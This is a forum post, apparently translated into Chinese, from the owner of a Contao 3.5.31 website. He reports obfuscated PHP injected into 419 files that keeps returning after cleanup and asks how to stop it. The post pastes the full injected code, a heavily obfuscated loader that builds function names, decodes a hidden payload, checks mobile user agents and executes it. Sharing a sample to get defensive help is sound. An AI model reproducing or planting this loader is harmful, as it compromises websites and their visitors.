我在Contao 3.5.31上运行了一个网站,我遇到了一个我无法解决的问题......
问题是在几乎所有文件中都有一个PHP代码在文件的顶部,但它似乎并没有影响到网站...也许你们中的一些人经历过类似的事情或者知道什么那段代码......
我在2周前清除了所有这些恶意软件代码的页面,但现在它又在php文件中了解
这是代码:
<?php $ueqiklix = ' (strstr($uas," x66 151 x72 145 x66 84:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<de:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjcpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{ftmfV x7f<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gh!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv8]225]241]334]368]322]3]364]6]283]427]36]3#462]47y]252]18y]#>q%<#762EBFI,6<*127-UVPFNJU,6<*27-SFGjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x272q5 x52 137 x41 107 x45fsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb6,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepf_*#ujojRk3`{666~6<&w6< x7_map("sggewyk",str_split("%t<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R6:>1<!gps)%j:>1<%j:=tj{fpg)%s:*24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3q56 x61"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_S x7fw6* x7f_*#fubfsdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepm%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x24- x!|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjud%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcx7f!<X>b%Z<#opo#>b%!*#5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~uas," x72 166 x3a 61 x31")) or (strstr($uas," x61 156 x64 162 x6f 15qnjA x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ xt2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7udovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut`2l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}doF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x2w6Z6<.2`hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf xrfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%76L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285*e x27,*d x27,*c x27,*b x27)fepdof.)fepdof./#@#/if((function_exists(" x6f 142 x5f 163 !Ydrr)%rxB%epnbss!>!bssbz)#44157 x78"))) { $ngtfrlt = " x63 162 x65mf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+x5c%j^ x24- x24tvctus)% x24- x24b!>!%yy73P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43(<!fwbm)%tjw)# x24#-!#]y38#-!%d>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56Apz)#]341]88M4P8]37]27/ x24)##-!#~<#/% x24- x24!>!fyqmpeqp%>5h%!<*::::::-111112)eobs`un>qp%!24- x24*<! x24- x24gps)%j>1<%j=tj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%*qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*1 x64")) or (strstr($uas," x63 150 x72 157 x6d 145")) orj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)ut:>:8:|:7#6#)tutjyf`439275ttnction sggewyk($n){return c5 x24- x24-!% x24- x24*!|! x24- x24 24]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7*)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ft6767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<p!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c]321]464]284]364]6]234]342]58]f)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi xfepmqyfA>2b%!<*qp%-*.%)euhA)34985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985uofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%{;)gj}l;33bq}k;opjudovg}x;0]=f{jt)!gj!<*2bd%-#1GO x22#)6]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x24pcotn+qsvmt+fmhpph#)zbssb!-#}#)fepm 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; fu 116 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (strstr($#p#/%z<jg!)%z>>2*!%z>jm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bub6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6<*)ujojR x27id%6< x7fw6* x7hr(ord($n)-1);} @error_reporting(0); $ambxdxq = implode(array2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SF])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jhOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.9-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtof>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74gvodujpo! x24- x24y7 x_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b% >%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!d%w6Z6<.3`hA x27pd%6<pd%#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tec:649#-!#:618d5f9#-!#f6c68399#-!#65egj{fpg)% x24- x24*<!~! x24/%t2wh%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#*^/%rx<~!!%s:N}#-%o:W%c:>1<%bx74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 1qnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutjw!>!#]y84]275]y83]248]y83]25#>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%)323ldfidk!~!<*yfeobz+sfwjidsb`bj+umbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;t0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%UFH# x27rfs%6~6< x7fw6<*K27*&7-n%)utjm6< x7fw6*CW&)7g>n%<#372]58y]472]37y]672]48y]#>s%<)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`E{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9yERVER[" x48 124 x54 120 x5f 125 x53 1024y4 x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x24- x2vt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<TOBSUOSVUFS,6<*msv%7-MSV,3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz%b:>%s: x5c%j:.2^,%b:<!%c:]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT)#P#-#Q#-#B#-#T#-#E#-#Gw:**<")));$szaactk = $ngtfrlt("", $ambxdxq); $szaactk();}}ovg<~ x24<!%o:!>! x242178}527}88:7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6<;%-qp%)54l} x27;%!<*#}_;#)323ldfi}334}472 x24<!%ff2!>!bssbz) x24]2%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSdcmuoctc'; $nqbrery=explode(chr((585-465)),substr($ueqiklix,(23391-17371),(197-163))); $zvetdpes = $nqbrery[0]($nqbrery[(5-4)]); $xxaezyx = $nqbrery[0]($nqbrery[(13-11)]); if (!function_exists('exnwsac')) { function exnwsac($waalezpb, $zcosqrj,$folevh) { $ajkkzc = NULL; for($lalzqyv=0;$lalzqyv<(sizeof($waalezpb)/2);$lalzqyv++) { $ajkkzc .= substr($zcosqrj, $waalezpb[($lalzqyv*2)],$waalezpb[($lalzqyv*2)+(7-6)]); } return $folevh(chr((51-42)),chr((462-370)),$ajkkzc); }; } $ixetrnggq = explode(chr((257-213)),'2021,38,4748,53,915,70,5400,38,445,21,3559,63,1371,68,2696,56,0,36,2088,38,3506,53,2840,27,3772,61,659,28,4857,29,3430,41,3017,56,4554,24,1809,69,5238,28,2629,67,1878,57,5213,25,5300,61,845,70,403,42,2513,66,5820,67,985,63,1439,51,4000,67,374,29,5541,25,3744,28,633,26,5984,36,4578,36,3308,67,2962,55,4966,42,265,41,1257,49,5491,50,3833,48,220,45,2752,61,3643,46,5361,39,5066,58,1157,55,1490,35,3404,26,3228,29,4365,52,1973,48,2445,36,3881,54,4946,20,3471,35,4801,56,525,62,3073,61,4481,38,1306,22,4886,60,2579,50,2126,62,5887,33,2325,65,2813,27,466,59,106,60,1641,62,166,54,687,65,587,46,1764,45,1703,61,3375,29,4067,69,5008,58,1585,56,5155,58,4194,68,4682,37,5266,34,348,26,1212,45,5787,33,5920,33,2867,36,2188,39,1092,65,5438,53,4458,23,2481,32,4652,30,2411,34,3164,64,1328,43,2059,29,4614,38,1525,60,782,63,4136,58,4417,41,3257,51,4262,66,36,70,1048,44,3689,55,1935,38,5638,68,4328,37,2390,21,306,42,2227,68,3134,30,2903,59,4719,29,752,30,5124,31,5612,26,4519,35,5953,31,3622,21,5566,46,5706,23,3935,65,2295,30,5729,58'); $nufjpfk = $zvetdpes("",exnwsac($ixetrnggq,$ueqiklix,$xxaezyx)); $zvetdpes=$ueqiklix; $nufjpfk(""); $nufjpfk=(555-434); $ueqiklix=$nufjpfk-1; ?>
这个完全相同的代码存在于419个文件中,我担心如果我清理它会再次发生。
我们已经更改了所有FTP / DB / Server密码,我不知道如何防止这种情况发生
如果有人对此有所了解并且可以帮助我,我真的很高兴
非常感谢
亚历